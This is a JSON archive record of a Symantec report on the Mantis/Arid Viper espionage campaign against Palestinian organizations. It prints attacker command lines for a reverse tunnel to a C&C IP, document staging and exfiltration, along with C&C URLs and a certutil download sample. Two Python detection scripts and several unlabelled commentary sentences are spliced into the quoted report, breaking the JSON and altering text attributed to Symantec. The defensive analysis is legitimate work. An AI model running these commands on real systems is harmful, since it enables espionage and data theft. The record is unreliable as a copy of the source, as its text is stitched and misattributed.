{
	"id": "0a85d20e-9063-413b-812c-2f4a31b05d7f",
	"created_at": "2026-04-06T00:09:25.883046Z",
	"updated_at": "2026-04-10T13:11:49.532974Z",
	"deleted_at": null,
	"sha1_hash": "36a4bd06471d80d2789f30bdd2f92f44a6634cc6",
	"title": "Mantis: New Tooling Used in Attacks Against Palestinian Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 71699,
	"plain_text": "Mantis: New Tooling Used in Attacks Against Palestinian Targets\r\nArchived: 2026-04-05 15:12:39 UTC\r\nThe Mantis cyber-espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be\r\noperating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going\r\nto great lengths to maintain a persistent presence on targeted networks.\r\nWhile the group is known for targeting organizations in the Middle East, the most recent campaign uncovered by\r\nSymantec, by Broadcom Software, focused on organizations within the Palestinian territories, with malicious\r\nactivity beginning in September 2022 and continuing to at least February 2023. This targeting is not\r\nunprecedented for Mantis, and Symantec previously uncovered attacks against individuals located in the\r\nPalestinian territories during 2017.\r\nBackground\r\nMantis has been active since at least 2014, with some third-party reporting suggesting it may have been active as\r\nearly as 2011. The group is known to target organizations in Israel and a number of other Middle Eastern\r\ncountries. Sectors targeted include government, military, financial, media, education, energy, and think tanks. The\r\ngroup is known for employing spear-phishing emails and fake social media profiles to lure targets into installing\r\nmalware on their devices.\r\nMantis is widely accepted to be linked to the Palestinian territories. While other vendors have linked the group to\r\nHamas, Symantec cannot make a definitive attribution to any Palestinian organization.\r\nIn its most recent attacks, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to\r\ncompromise targets before engaging in extensive credential theft and exfiltration of stolen data.\r\nAttack chain\r\nThe initial infection vector for this campaign remains unknown. 
In one organization targeted, a feature of the\r\ncompromise was that the attackers deployed three distinct versions of the same toolset (i.e. different variants of\r\nthe same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a\r\nprecautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the\r\ntarget’s network.\r\nThe following is a description of how one of those three toolsets was used:\r\nThe first evidence of malicious activity occurred on December 18, 2022. Three distinct sets of obfuscated\r\nPowerShell commands were executed to load a Base64-encoded string, which started embedded shellcode. The\r\nshellcode was a 32-bit stager that downloaded another stage using a basic TCP-based protocol from a command-and-control (C\u0026C) server: 104.194.222[.]50 port 4444.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks\r\nPage 1 of 6\n\nThe attackers returned on December 19 to dump credentials before downloading the Micropsia backdoor and\r\nPuTTY, a publicly available SSH client, using Certutil and BITSAdmin.\r\nMicropsia subsequently executed and initiated contact with a C\u0026C server. On the same day, Micropsia also\r\nexecuted on three other machines in the same organization. 
In each case, it ran in a folder named after its file\r\nname:\r\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\r\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\r\ncsidl_common_appdata\\windowsps\\windowsps.exe\r\nOn one computer, Micropsia was used to set up a reverse SOCKS tunnel to an external IP address:\r\nCSIDL_COMMON_APPDATA\\windowsservicemanageav\\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED]\r\nOn December 20, Micropsia was used to run an unknown executable named windowspackages.exe on one of the\r\ninfected computers.\r\nThe following day, December 21, RAR was executed to archive files on another infected computer.\r\nBetween December 22 and January 2, 2023, Micropsia was used to execute the Arid Gopher backdoor on three\r\ninfected computers. Arid Gopher was in turn used to run a tool called SetRegRunKey.exe that provided\r\npersistence by adding Arid Gopher to the registry so that it executed on reboot. It also ran an unknown file named\r\nlocalsecuritypolicy.exe (this file name was used for the Arid Gopher backdoor elsewhere by the attackers).\r\nOn December 28, Micropsia was used to run windowspackages.exe on three more infected computers.\r\nOn December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and\r\nnetworkuefidiagsbootserver.exe on two of the infected computers.\r\nOn January 2, the attackers retired the version of Arid Gopher they were using and introduced a new variant.\r\nWhether this was because the first version was discovered or whether it was standard operating procedure is\r\nunclear.\r\nOn January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, on a single\r\ncomputer from the folder: csidl_common_appdata\\hostupbroker\\hostupbroker.exe. 
This was immediately followed\r\nby the exfiltration of a RAR file:\r\nCSIDL_COMMON_APPDATA\\windowsupserv\\windowsupserv.exe -f CSIDL_COMMON_APPDATA\\windowspackages\\01-04-2023-15-13-39_getf.rar\r\nOn January 9, Arid Gopher was used to execute two unknown files on a single computer:\r\ncsidl_common_appdata\\teamviewrremoteservice\\teamviewrremoteservice.exe\r\ncsidl_common_appdata\\embededmodeservice\\embededmodeservice.exe\r\nThe last malicious activity occurred from January 12 onwards when Arid Gopher was used to execute the\r\nunknown file named localsecuritypolicy.exe every ten hours.\r\nMicropsia\r\nVariants of the Micropsia backdoor used in these attacks appear to be slightly updated versions of those seen by\r\nother vendors. In this campaign, Micropsia was deployed using multiple file names and file paths:\r\ncsidl_common_appdata\\microsoft\\dotnet35\\microsoftdotnet35.exe\r\ncsidl_common_appdata\\microsoftservicesusermanual\\systempropertiesinternationaltime.exe\r\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\r\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\r\ncsidl_common_appdata\\windowsps\\windowsps.exe\r\nMicropsia is executed using WMI and its main purpose appears to be running secondary payloads for the\r\nattackers. 
These included:\r\nArid Gopher (file names: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe,\r\nnetworkvirtualizationseoservice.exe)\r\nReverse SOCKS Tunneler (aka Revsocks) (file name: windowsservicemanageav.exe)\r\nData Exfiltration Tool (file name: windowsupserv.exe)\r\nTwo unknown files, both named hostupbroker.exe\r\nUnknown file named windowspackages.exe\r\nIn addition to this, Micropsia has its own functionality, such as taking screenshots, keylogging, and archiving\r\ncertain file types using WinRAR in preparation for data exfiltration:\r\n\"%PROGRAMDATA%\\Software Distributions\\WinRAR\\Rar.exe\" a -r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 \"%PROGRAMDATA%\\Software Distributions\\Bdl\\LMth__C_2023-02-13 17-14-41\" \"%USERPROFILE%\\*.xls\" \"%USERPROFILE%\\*.xlsx\" \"%USERPROFILE%\\*.doc\" \"%USERPROFILE%\\*.docx\" \"%USERPROFILE%\\*.csv\" \"%USERPROFILE%\\*.pdf\" \"%USERPROFILE%\\*.ppt\" \"%USERPROFILE%\\*.pptx\" \"%USERPROFILE%\\*.odt\" \"%USERPROFILE%\\*.mdb\" \"%USERPROFILE%\\*.accdb\" \"%USERPROFILE%\\*.accde\" \"%USERPROFILE%\\*.txt\" \"%USERPROFILE%\\*.rtf\" \"%USERPROFILE%\\*.vcf\"\r\nThe switches are worth reading: -r recurses subfolders, -ep1 drops the base path from stored names, -v2500k splits the output into 2500 KB volumes, -hp encrypts both file data and headers with the given password (so file names inside the archive are hidden too), and -ta2023-01-14 selects only files modified after that date, which keeps each collection run incremental.\r\nArid Gopher\r\nUnlike Micropsia, which is written in Delphi, Arid Gopher is written in Go. 
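Before turning to Arid Gopher in detail: the command lines quoted in the attack chain and Micropsia sections above are concrete enough to hunt for in process-creation telemetry. The following is an added example and not code from the Symantec report. It is a small Python scanner whose patterns (an encoded PowerShell command, certutil/BITSAdmin downloads, a ProgramData executable opening a reverse tunnel with -connect, Rar.exe staging %USERPROFILE% documents behind a -hp password, windowsupserv.exe with -f/-d, the AttestationWmiProvider -key/-value pair, and the report's observation that Micropsia ran from a ProgramData folder named after its own file) are my assumptions derived from those quotes and will need local tuning. The sample events are constructed, with C:\ProgramData standing in for CSIDL_COMMON_APPDATA and an assumed certutil download URL. It also decodes the -EncodedCommand payload, which the report describes only as a Base64 string that starts embedded shellcode.

```python
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Hit:
    host: str
    rule: str
    cmdline: str


# Patterns are my own assumptions written from the command lines quoted in the
# report; they are not Symantec detection content and will need tuning locally.
RULES = [
    ("encoded_powershell",
     re.compile(r'powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}', re.I)),
    ("lolbin_download",
     re.compile(r'certutil(?:\.exe)?\b.*-urlcache|bitsadmin(?:\.exe)?\b.*/transfer', re.I)),
    ("programdata_reverse_tunnel",
     re.compile(r'programdata\\[^\s"]*\.exe"?\s+-connect\s+\d{1,3}(?:\.\d{1,3}){3}:\d+', re.I)),
    ("rar_staging_user_docs",
     re.compile(r'rar(?:\.exe)?"?\s+a\s.*\s-hp\S+.*%userprofile%\\\*\.(?:docx?|xlsx?|pptx?|pdf|csv|txt|rtf|odt|mdb|accd[be]|vcf)', re.I)),
    ("windowsupserv_exfil",
     re.compile(r'windowsupserv\.exe"?\s+-[fd]\s', re.I)),
    ("run_key_helper",
     re.compile(r'attestationwmiprovider\.exe"?\s+-key=\S+\s+"?-value=', re.I)),
    # The report notes Micropsia ran from a ProgramData folder named after its
    # own file name (...\windowsps\windowsps.exe); the backreference catches the
    # convention without depending on any particular name.
    ("programdata_self_named_dir",
     re.compile(r'programdata\\([a-z0-9]+)\\\1\.exe', re.I)),
]


def scan(events):
    """events: iterable of (host, command_line). Returns one Hit per matching rule."""
    return [Hit(host, name, cmd) for host, cmd in events for name, rx in RULES if rx.search(cmd)]


def decode_powershell_enc(cmdline):
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r'\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)', cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample events (not real telemetry) modelled on the report's
# command lines; C:\ProgramData stands in for CSIDL_COMMON_APPDATA and the
# certutil URL is an assumption, the report does not give the download source.
_ENC = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("ws01", f"powershell.exe -NoP -W Hidden -Enc {_ENC}"),
    ("ws01", r"certutil.exe -urlcache -split -f http://104.194.222.50/x.exe C:\ProgramData\windowsps\x.exe"),
    ("ws01", r"C:\ProgramData\windowsps\windowsps.exe"),
    ("ws02", r"C:\ProgramData\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222.50:443"),
    ("ws03", r'"C:\ProgramData\Software Distributions\WinRAR\Rar.exe" a -r -ep1 -v2500k -hp71012f4c '
             r'-ta2023-01-14 "C:\ProgramData\Software Distributions\Bdl\LMth" "%USERPROFILE%\*.xls" "%USERPROFILE%\*.docx"'),
    ("ws03", r"C:\ProgramData\windowsupserv\windowsupserv.exe -f C:\ProgramData\windowspackages\01-04-2023-15-13-39_getf.rar"),
    ("ws04", r'C:\ProgramData\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService '
             r'"-value=C:\ProgramData\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x"'),
    ("ws05", r'"C:\Program Files\Git\cmd\git.exe" fetch --all'),                      # benign
    ("ws05", r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),  # benign
]

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h.host}  {h.rule:28}  {h.cmdline[:60]}")
    print(decode_powershell_enc(SAMPLE_EVENTS[0][1]))
```

The self-named-folder rule is the one most worth keeping even after the specific file names in this report rotate, since the report shows the attackers changed names freely but kept the convention; the two benign events show that a plain script invocation and a third-party tool under Program Files do not trip any rule.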
Versions of Arid Gopher used in this\r\ncampaign contain the following embedded components:\r\n7za.exe – A copy of the legitimate 7-Zip executable\r\nAttestationWmiProvider.exe – A tool that sets a “run” registry value\r\nServiceHubIdentityHost.exe – A copy of the legitimate Shortcut.exe executable from Optimum X\r\nSetup.env – Configuration file\r\nArid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe,\r\nlocalsecuritypolicy.exe, and networkuefidiagsbootserver.exe, in addition to being used to download and execute\r\nfiles obfuscated with PyArmor.\r\nWhen communicating with a C\u0026C server, Arid Gopher registers a device on one path then connects to another\r\npath, likely to receive commands:\r\nConnects to: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) - likely to register device\r\nFollowed by: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - likely to receive commands\r\nConnects to: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) - likely to register device\r\nFollowed by: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - likely to receive commands\r\nBoth domains expose the same path layout under the IURTIER3BNV4ER prefix (one path to register, another to poll for commands), so the URI structure is a more durable hunting indicator than either domain or IP address on its own.\r\nArid Gopher appears to be regularly updated and rewritten by the attackers, most likely in order to evade\r\ndetection. One variant of the malware was radically different from previous versions seen with most of the\r\ndistinctive code updated, so much so that there was not a single subroutine that contained identical distinctive\r\ncode when compared with the previous version. 
Mantis appeared to be aggressively mutating the logic between\r\nvariants, which is a time-intensive operation if done manually.\r\nThe embedded setup.env file used by one analyzed variant of Arid Gopher to retrieve configuration data contained\r\nthe following:\r\nDIR=WindowsPerceptionService\r\nENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER\r\nLOGS=logs.txt\r\nDID=code.txt\r\nVER=6.1\r\nEN=2\r\nST_METHOD=r\r\nST_MACHINE=false\r\nST_FLAGS=x\r\nCOMPRESSOR=7za.exe\r\nDDIR=ResourcesFiles\r\nBW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002\r\nSERVER_TOKEN=PDqMKZ91l2XDmDELOrKB\r\nSTAPP=AttestationWmiProvider.exe\r\nSHORT_APP=ServiceHubIdentityHost.exe\r\nThe setup.env configuration file mentions another file, AttestationWmiProvider.exe, which is also embedded in\r\nArid Gopher. The file is a 32-bit executable that is used as a helper to ensure that another executable will run on\r\nreboot. When it executes, it checks for the following command-line arguments:\r\n\"key\" with string parameter [RUN_VALUE_NAME]\r\n\"value\" with string parameter [RUN_PATHNAME]\r\nIt then registers to be notified of an operating-system signal using Go's os/signal.Notify() and waits. Once notified, it sets the\r\nfollowing registry value:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RUN_VALUE_NAME]\" = \"[RUN_PATHNAME]\"\r\nBecause the value lives under HKEY_CURRENT_USER, writing it needs no administrative rights, and the payload is launched at that user's next logon rather than at boot.\r\nOur investigation so far shows this file setting Arid Gopher to run on reboot:\r\nCSIDL_COMMON_APPDATA\\attestationwmiprovider\\attestationwmiprovider.exe -key=NetworkVirtualizationStartService \"-value=CSIDL_COMMON_APPDATA\\networkvirtualizationstartservice\\networkvirtualizationstartservice.exe -x\"\r\nExfiltration Tool\r\nThe attackers also used a custom tool to exfiltrate data stolen from targeted organizations: a 64-bit PyInstaller\r\nexecutable named WindowsUpServ.exe. 
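The upload format this section attributes to WindowsUpServ (an HTTP POST carrying the file under the kjdfnqweb parameter and the victim hostname under qyiwekq, with the local file deleted once the server answers 200) is simple enough to recognise on the wire. The following is an added example, not Symantec's code and not the tool itself: a Python detector that parses a captured HTTP request and flags one carrying both field names, returning the victim hostname, the size and leading bytes of the uploaded content, and the target URL. The report does not say how the POST body is encoded, so handling both multipart/form-data and application/x-www-form-urlencoded is an assumption; the sample requests, their Host header, URL path and RAR-like file bytes are constructed.

```python
import re
from urllib.parse import parse_qs

# Field names the report attributes to WindowsUpServ's upload request.
FIELD_CONTENT = "kjdfnqweb"   # the file bytes
FIELD_HOST = "qyiwekq"        # hostname of the affected computer


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body, boundary):
    """Minimal multipart/form-data splitter: returns {field name: raw bytes}."""
    fields = {}
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        part_head, _, value = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', part_head)
        if m:
            # the CRLF before the next delimiter belongs to the delimiter
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def form_fields(headers, body):
    """Form fields of a POST body. The report does not say which encoding the
    tool uses, so both common ones are handled (assumption)."""
    ctype = headers.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        m = re.search(r'boundary="?([^";]+)', ctype)
        return parse_multipart(body, m.group(1)) if m else {}
    if ctype.startswith("application/x-www-form-urlencoded"):
        # latin-1 round-trips every byte, so binary file content survives intact
        decoded = parse_qs(body.decode("latin-1"), encoding="latin-1")
        return {k: v[0].encode("latin-1") for k, v in decoded.items()}
    return {}


def detect_windowsupserv(raw):
    """Return upload details if the request carries both field names, else None."""
    request_line, headers, body = parse_http_request(raw)
    if not request_line.startswith("POST "):
        return None
    fields = form_fields(headers, body)
    if FIELD_CONTENT not in fields or FIELD_HOST not in fields:
        return None
    content = fields[FIELD_CONTENT]
    return {
        "victim_host": fields[FIELD_HOST].decode("latin-1", "replace"),
        "bytes": len(content),
        "file_magic": content[:4],
        "target": headers.get("host", "") + request_line.split()[1],
    }


# Constructed sample traffic (not a real capture). The host name, URL path and
# file bytes are assumptions; the report does not give the upload URL.
_BOUNDARY = "constructedBoundary7f3a"
_RAR = b"Rar!\x1a\x07\x01\x00" + bytes(24)    # RAR5 signature plus padding


def _multipart(fields):
    out = b""
    for name, value in fields:
        out += f'--{_BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'.encode() + value + b"\r\n"
    return out + f"--{_BOUNDARY}--\r\n".encode()


_BODY = _multipart([(FIELD_CONTENT, _RAR), (FIELD_HOST, b"WS03")])
SAMPLE_EXFIL = (b"POST /upload HTTP/1.1\r\nHost: example.invalid\r\n"
                + f"Content-Type: multipart/form-data; boundary={_BOUNDARY}\r\n".encode()
                + f"Content-Length: {len(_BODY)}\r\n\r\n".encode() + _BODY)
SAMPLE_EXFIL_URLENC = (b"POST /upload HTTP/1.1\r\nHost: example.invalid\r\n"
                       b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                       b"kjdfnqweb=Rar%21%1A%07%01%00&qyiwekq=WS04")
SAMPLE_BENIGN = (b"POST /login HTTP/1.1\r\nHost: example.invalid\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                 b"user=alice&password=pw1")

if __name__ == "__main__":
    for name, req in [("exfil", SAMPLE_EXFIL), ("exfil_urlenc", SAMPLE_EXFIL_URLENC), ("benign", SAMPLE_BENIGN)]:
        print(name, detect_windowsupserv(req))
```

Because the tool deletes each file as soon as the server answers 200, a full-content capture or proxy log may hold the only copy of what left the network, and the on-disk residue is limited to the success.txt and err.txt logs under C:\ProgramData\WindowsUpServ. Matching on the two parameter names is deliberately narrow; the victim hostname the detector returns is the natural pivot into host telemetry for the same machine.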
When run, the tool checks for the following command-line arguments:\r\n\"-d\" \"[FILE_DIRECTORY]\"\r\n\"-f\" \"[FILENAME]\"\r\nFor each \"-f\" \"[FILENAME]\" command-line argument, the tool uploads the content of [FILENAME]. For each \"-d\" \"[FILE_DIRECTORY]\" command-line argument, the tool obtains a list of files stored in the\r\nfolder [FILE_DIRECTORY] and uploads the content of each file.\r\nWhen uploading each file, the tool sends an HTTP POST request to a C\u0026C server with the following parameters:\r\n\"kjdfnqweb\": [THE_FILE_CONTENT]\r\n\"qyiwekq\": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]\r\nWhenever the remote server responds with the status code 200, the malware deletes the uploaded file from the\r\nlocal disk. The malware may also log some of its actions in the following files:\r\n\"C:\\ProgramData\\WindowsUpServ\\success.txt\"\r\n\"C:\\ProgramData\\WindowsUpServ\\err.txt\"\r\nDetermined Adversary\r\nMantis appears to be a determined adversary, willing to put time and effort into maximizing its chances of success,\r\nas evidenced by extensive malware rewriting and its decision to compartmentalize attacks against single\r\norganizations into multiple separate strands to reduce the chances of the entire operation being detected.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks"
	],
	"report_names": [
		"mantis-palestinian-attacks"
	],
	"threat_actors": [
		{
			"id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d",
			"created_at": "2022-10-25T16:07:23.539852Z",
			"updated_at": "2026-04-10T02:00:04.647734Z",
			"deleted_at": null,
			"main_name": "Desert Falcons",
			"aliases": [
				"APT-C-23",
				"ATK 66",
				"Arid Viper",
				"Niobium",
				"Operation Arid Viper",
				"Operation Bearded Barbie",
				"Operation Rebound",
				"Pinstripe Lightning",
				"Renegade Jackal",
				"TAG-63",
				"TAG-CT1",
				"Two-tailed Scorpion"
			],
			"source_name": "ETDA:Desert Falcons",
			"tools": [
				"AridSpy",
				"Barb(ie) Downloader",
				"BarbWire",
				"Desert Scorpion",
				"FrozenCell",
				"GlanceLove",
				"GnatSpy",
				"KasperAgent",
				"Micropsia",
				"PyMICROPSIA",
				"SpyC23",
				"Viper RAT",
				"ViperRAT",
				"VolatileVenom",
				"WinkChat",
				"android.micropsia"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b1979c55-037a-415f-b0a3-cab7933f5cd4",
			"created_at": "2024-04-24T02:00:49.561432Z",
			"updated_at": "2026-04-10T02:00:05.416794Z",
			"deleted_at": null,
			"main_name": "APT-C-23",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"TAG-63",
				"Grey Karkadann",
				"Big Bang APT",
				"Two-tailed Scorpion"
			],
			"source_name": "MITRE:APT-C-23",
			"tools": [
				"Micropsia"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "929d794b-0e1d-4d10-93a6-29408a527cc2",
			"created_at": "2023-01-06T13:46:38.70844Z",
			"updated_at": "2026-04-10T02:00:03.075002Z",
			"deleted_at": null,
			"main_name": "AridViper",
			"aliases": [
				"Desert Falcon",
				"Arid Viper",
				"APT-C-23",
				"Bearded Barbie",
				"Two-tailed Scorpion"
			],
			"source_name": "MISPGALAXY:AridViper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b",
			"created_at": "2025-08-07T02:03:24.53077Z",
			"updated_at": "2026-04-10T02:00:03.680525Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SARATOGA",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"Extreme Jackal ",
				"Gaza Cybergang",
				"Molerats ",
				"Operation DustySky ",
				"TA402"
			],
			"source_name": "Secureworks:ALUMINUM SARATOGA",
			"tools": [
				"BlackShades",
				"BrittleBush",
				"DarkComet",
				"LastConn",
				"Micropsia",
				"NimbleMamba",
				"PoisonIvy",
				"QuasarRAT",
				"XtremeRat"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "35b3e533-7483-4f07-894e-2bb3ac855207",
			"created_at": "2025-08-07T02:03:24.540035Z",
			"updated_at": "2026-04-10T02:00:03.69627Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SHADYSIDE",
			"aliases": [
				"APT-C-23 ",
				"Arid Viper ",
				"Desert Falcon "
			],
			"source_name": "Secureworks:ALUMINUM SHADYSIDE",
			"tools": [
				"Micropsia",
				"SpyC23"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434165,
	"ts_updated_at": 1775826709,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/36a4bd06471d80d2789f30bdd2f92f44a6634cc6.pdf",
		"text": "https://archive.orkl.eu/36a4bd06471d80d2789f30bdd2f92f44a6634cc6.txt",
		"img": "https://archive.orkl.eu/36a4bd06471d80d2789f30bdd2f92f44a6634cc6.jpg"
	}
}